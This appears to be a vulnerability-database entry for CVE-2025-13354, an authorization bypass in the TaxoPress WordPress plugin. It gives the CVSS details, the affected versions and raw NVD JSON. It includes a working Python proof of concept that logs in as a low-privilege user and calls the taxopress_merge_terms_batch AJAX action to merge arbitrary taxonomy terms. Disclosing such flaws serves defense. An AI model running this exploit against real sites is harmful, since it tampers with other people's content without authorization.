Security Vulnerability Report
δΈ­ζ–‡
CVE-2025-13354 CVSS 4.3 MEDIUM

CVE-2025-13354

Published: 2025-12-03 14:15:47
Last Modified: 2025-12-05 18:41:57

Description

The Tag, Category, and Taxonomy Manager – AI Autotagger with OpenAI plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 3.40.1. This is due to the plugin not properly verifying that a user is authorized to perform an action in the "taxopress_merge_terms_batch" function. This makes it possible for authenticated attackers, with subscriber level access and above, to merge or delete arbitrary taxonomy terms.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:taxopress:taxopress:*:*:*:*:*:wordpress:*:* - VULNERABLE
TaxoPress (Tag, Category, and Taxonomy Manager) <= 3.40.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-13354 PoC - Taxonomy Manager Authorization Bypass # Target: WordPress site with TaxoPress plugin <= 3.40.1 def exploit_taxonomy_merge(target_url, username, password, source_term_id, target_term_id): """ Exploit the authorization bypass in taxopress_merge_terms_batch function to merge arbitrary taxonomy terms. Args: target_url: WordPress site URL username: Valid WordPress username (subscriber level or higher) password: User password source_term_id: ID of the source term to merge from target_term_id: ID of the target term to merge into """ # Login to WordPress login_url = f"{target_url}/wp-login.php" session = requests.Session() login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': f"{target_url}/wp-admin/", 'testcookie': '1' } response = session.post(login_url, data=login_data) if 'wordpress_logged_in' not in session.cookies.get_dict(): print("[-] Login failed") return False print("[+] Login successful") # Exploit the authorization bypass ajax_url = f"{target_url}/wp-admin/admin-ajax.php" exploit_data = { 'action': 'taxopress_merge_terms_batch', 'source_term_id': source_term_id, 'target_term_id': target_term_id, 'taxonomy': 'post_tag' # Can be any registered taxonomy } response = session.post(ajax_url, data=exploit_data) if response.status_code == 200: print(f"[+] Exploit sent - Terms merged: {source_term_id} -> {target_term_id}") print(f"[+] Response: {response.text}") return True else: print(f"[-] Exploit failed with status code: {response.status_code}") return False if __name__ == "__main__": if len(sys.argv) < 6: print(f"Usage: python {sys.argv[0]} <target_url> <username> <password> <source_term_id> <target_term_id>") print(f"Example: python {sys.argv[0]} http://example.com admin password 5 10") sys.exit(1) target_url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] source_term_id = sys.argv[4] target_term_id = sys.argv[5] exploit_taxonomy_merge(target_url, username, password, source_term_id, target_term_id)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13354", "sourceIdentifier": "[email protected]", "published": "2025-12-03T14:15:46.930", "lastModified": "2025-12-05T18:41:56.647", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Tag, Category, and Taxonomy Manager – AI Autotagger with OpenAI plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 3.40.1. This is due to the plugin not properly verifying that a user is authorized to perform an action in the \"taxopress_merge_terms_batch\" function. This makes it possible for authenticated attackers, with subscriber level access and above, to merge or delete arbitrary taxonomy terms."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:taxopress:taxopress:*:*:*:*:*:wordpress:*:*", "versionEndExcluding": "3.41.0", "matchCriteriaId": "CE8412F8-3636-4267-8AF5-D87CF86ADEC2"}]}]}], "references": [{"url": "https://github.com/TaxoPress/TaxoPress/commit/5eb2cee861ebd109152eea968aca0259c078c8b0", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/05c1ee52-02c9-440b-9269-14ea8b73be45?source=cve", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}